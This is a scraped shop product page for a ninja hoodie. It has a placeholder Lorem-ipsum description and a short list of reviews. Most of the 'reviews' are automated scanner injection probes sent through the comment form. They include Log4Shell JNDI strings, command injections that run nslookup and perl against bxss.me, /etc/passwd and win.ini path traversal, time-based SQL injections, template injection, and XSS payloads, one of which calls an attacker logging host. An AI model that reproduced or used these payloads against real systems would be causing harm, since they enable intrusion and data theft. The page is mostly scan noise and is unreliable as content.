Açıklama
Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.
student –
Perfect Hoodie for a Ninja!
Coen Jacobs –
I have lots of hoodies, but none is as cool as this one!
Dan –
I love hoodies, and ninjas, so what could be better than a ninja hoodie? Not much, if you ask me!
Ryan –
This is the most bombastic hoodie in this shop, it\’s soft and has the sly WooThemes ninja on it. Why wouldn\’t you buy this?
Maria –
This only gets 1 star because I don\’t have this yet. I want it now!
1 –
555
${j${::-n}di:dns${::-:}//hitdmnvsoxett69441${::-.}bxss.me}zzzz –
555
1 –
${j${::-n}di:dns${::-:}//hitnngerrfkngf57f5${::-.}bxss.me}zzzz
response.write(9427658*9958469) –
555
1*1 –
555
echo zkoewt$()\ cgkzqi\nz^xyu||a #’ &echo zkoewt$()\ cgkzqi\nz^xyu||a #|” &echo zkoewt$()\ cgkzqi\nz^xyu||a # –
555
$(nslookup hitxlpaqmvqajacecf.bxss.me||perl -e “gethostbyname(‘hitxlpaqmvqajacecf.bxss.me’)”) –
555
../../../../../../../../../../../../../../etc/passwd –
555
1 –
12345′”\’\”);|]*{
”💡
1 –
;(nslookup hitdyravemgel3e294.bxss.me||perl -e “gethostbyname(‘hitdyravemgel3e294.bxss.me’)”)|(nslookup hitdyravemgel3e294.bxss.me||perl -e “gethostbyname(‘hitdyravemgel3e294.bxss.me’)”)&(nslookup hitdyravemgel3e294.bxss.me||perl -e “gethostbyname(‘hitdyravemgel3e294.bxss.me’)”)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg –
555
1&n979572=v910260 –
555
1 –
555
) –
555
1 –
!(()&&!|*|*|
m37UGK6a’; waitfor delay ‘0:0:15’ — –
555
‘.gethostbyname(lc(‘hitct’.’yjetholo0f9da.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(121).chr(88).chr(117).chr(65).’ –
555
-5) OR 291=(SELECT 291 FROM PG_SLEEP(15))– –
555
1 –
‘+’A’.concat(70-3).concat(22*4).concat(107).concat(70).concat(119).concat(71)+(require’socket’
Socket.gethostbyname(‘hitqj’+’wiidscpi820a0.bxss.me.’)[3].to_s)+’
wp-comments-post.php/. –
555
/xfs.bxss.me –
555
1 –
‘”
1 –
‘”()&%oWvk(9793)
1 –
555
@@TozJJ –
555
1 –
D5mUoNs3
1 –
1*555
1 –
if(now()=sysdate(),sleep(15),0)
1 –
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
1 –
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1 –
-1); waitfor delay ‘0:0:15’ —
1 –
1 waitfor delay ‘0:0:15’ —
1 –
-5 OR 404=(SELECT 404 FROM PG_SLEEP(15))–
1 –
-5) OR 904=(SELECT 904 FROM PG_SLEEP(15))–
1 –
-1)) OR 638=(SELECT 638 FROM PG_SLEEP(15))–
1 –
eCABzxsS’) OR 363=(SELECT 363 FROM PG_SLEEP(15))–
1 –
V2ZhATuv’)) OR 927=(SELECT 927 FROM PG_SLEEP(15))–
1 –
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1 –
555
1 –
555
1 –
555
${j${::-n}di:dns${::-:}//hitzgjbtunbaub9151${::-.}bxss.me}zzzz –
555
1 –
${j${::-n}di:dns${::-:}//hitorvjoyyyhi7314c${::-.}bxss.me}zzzz
ifr8CGuz –
555
“+response.write(9478675*9378935)+” –
555
(25-19-5) –
555
(937-931-5) –
555
&(nslookup hitoatugqkpmc107b6.bxss.me||perl -e “gethostbyname(‘hitoatugqkpmc107b6.bxss.me’)”)&’\”`0&(nslookup hitoatugqkpmc107b6.bxss.me||perl -e “gethostbyname(‘hitoatugqkpmc107b6.bxss.me’)”)&`’ –
555
1 –
echo djatwo$()\ xhvxdv\nz^xyu||a #’ &echo djatwo$()\ xhvxdv\nz^xyu||a #|” &echo djatwo$()\ xhvxdv\nz^xyu||a #
1 –
(nslookup hithcnibgtiai0a185.bxss.me||perl -e “gethostbyname(‘hithcnibgtiai0a185.bxss.me’)”)
1 –
`(nslookup hitsxlgsapwwx26794.bxss.me||perl -e “gethostbyname(‘hitsxlgsapwwx26794.bxss.me’)”)`
Anonim –
555
1 –
../../../../../../../../../../../../../../windows/win.ini
1 –
555
1 –
${9999136+9999147}
1 –
555
1&n996646=v912703 –
555
-1); waitfor delay ‘0:0:15’ — –
555
!(()&&!|*|*| –
555
1 –
^(#$!@#$)(()))******
‘.gethostbyname(lc(‘hittd’.’abbnxyxp7f10d.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(116).chr(76).chr(100).chr(83).’ –
555
1 –
“.gethostbyname(lc(“hitae”.”sdtqeijxed76e.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(117).chr(78).chr(113).chr(78).”
1 –
bxss.me/t/xss.html?%00
‘+’A’.concat(70-3).concat(22*4).concat(109).concat(81).concat(116).concat(76)+(require’socket’ Socket.gethostbyname(‘hitju’+’xuirjzfq7a260.bxss.me.’)[3].to_s)+’ –
555
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) –
555
‘” –
555
1 –
<!–
1 –
555′”()&%xjyZ(9097)
1 –
5559415779
1 –
acux5719z1z2abcxuca5719
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’ –
555
1 –
1}}”}}’}}1%>”%>’%>
1 –
acx{{98991*97996}}xca
1 –
555*20*15*0
1 –
555*75*70*0
1 –
555*328*323*0
1 –
555*488*483*0
1 –
-1 OR 3+574-574-1=0+0+0+1
1 –
5557QOB3[!+!]
1 –
555<ScRIpT>xjyZ(9713)</sCrIpT>
1 –
555xjyZ(9321)
1 –
-1; waitfor delay ‘0:0:15’ —
1 –
%35%35%35%3C%53%63%52%69%50%74%20%3E%78%6A%79%5A%289332%29%3C%2F%73%43%72%69%70%54%3E
1 –
555<ScRiPt>xjyZ(9940)</sCripT>
1 –
1 –
1 –
1 –
1 –
1 –
1%2527%2522
1 –
555<img sRc='http://attacker-9591/log.php?
1 –
555<afgCL89<
1 –
%35%35%35%39%39%31%31%22%28%29%3B%7D%5D%39%36%32%32
1 –
555
1 –
555
${j${::-n}di:dns${::-:}//hitmsekofzwxk5571c${::-.}bxss.me}zzzz –
555
1 –
&echo tabmpc$()\ hutoqi\nz^xyu||a #’ &echo tabmpc$()\ hutoqi\nz^xyu||a #|” &echo tabmpc$()\ hutoqi\nz^xyu||a #
1 –
WrBIH1fx
-1 OR 3+276-276-1=0+0+0+1 –
555
1some_inexistent_file_with_long_name.jpg –
555
‘”() –
555
“.gethostbyname(lc(“hitpb”.”kjsvyihea6821.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(118).chr(73).chr(98).chr(88).” –
555
1 –
‘;print(md5(31337));$a=’
vBXnmLjl’; waitfor delay ‘0:0:15’ — –
555
1 –
555′”()&%ZUBw(9514)
1 –
555
auzOfetW’)) OR 919=(SELECT 919 FROM PG_SLEEP(15))– –
555
1′” –
555
1 –
BJVaEC5v
1 –
555*94*89*0
1 –
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
1 –
zPm5qs1u’; waitfor delay ‘0:0:15’ —
1 –
-5) OR 741=(SELECT 741 FROM PG_SLEEP(15))–
1 –
1aiWd6lt’ OR 922=(SELECT 922 FROM PG_SLEEP(15))–
1 –
hugZ7SCX’)) OR 288=(SELECT 288 FROM PG_SLEEP(15))–
1 –
1′”